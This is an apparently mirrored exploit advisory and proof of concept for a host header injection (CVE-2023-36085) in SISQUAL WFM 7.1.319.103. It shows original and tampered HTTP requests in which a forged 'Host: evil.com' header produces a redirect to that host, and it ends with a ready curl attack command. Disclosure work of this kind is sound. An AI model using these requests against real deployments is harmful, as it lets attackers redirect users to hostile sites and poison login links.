SISQUAL WFM 7.1.319.103 Host Header Injection
2024-2-7 04:32:21 Author: cxsecurity.com(查看原文) 阅读量:12 收藏

SISQUAL WFM 7.1.319.103 Host Header Injection

# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection # Discovered Date: 17/03/2023 # Reported Date: 17/03/2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://www.sisqualwfm.com # Version: 7.1.319.103 # Tested on: SISQUAL WFM 7.1.319.103 # Affected Version: sisqualWFM - 7.1.319.103 # Fixed Version: sisqualWFM - 7.1.319.111 # CVE : CVE-2023-36085 # CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Category: Web Apps # Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085 A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header. **************************************************************************************************** Orignal Request **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: sisqualwfm.cloud Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Orignal Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Date: Wed, 22 Mar 2023 13:22:10 GMT Content-Length: 0 **************************************************************************************************** ██████╗ ██████╗ ██████╗ ██╔══██╗██╔═══██╗██╔════╝ ██████╔╝██║ ██║██║ ██╔═══╝ ██║ ██║██║ ██║ ╚██████╔╝╚██████╗ ╚═╝ ╚═════╝ ╚═════╝ **************************************************************************************************** Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy) **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: evil.com Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://evil.com/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 0 **************************************************************************************************** Method of Attack **************************************************************************************************** curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv ****************************************************************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024020026
如有侵权请联系:admin#unsafe.sh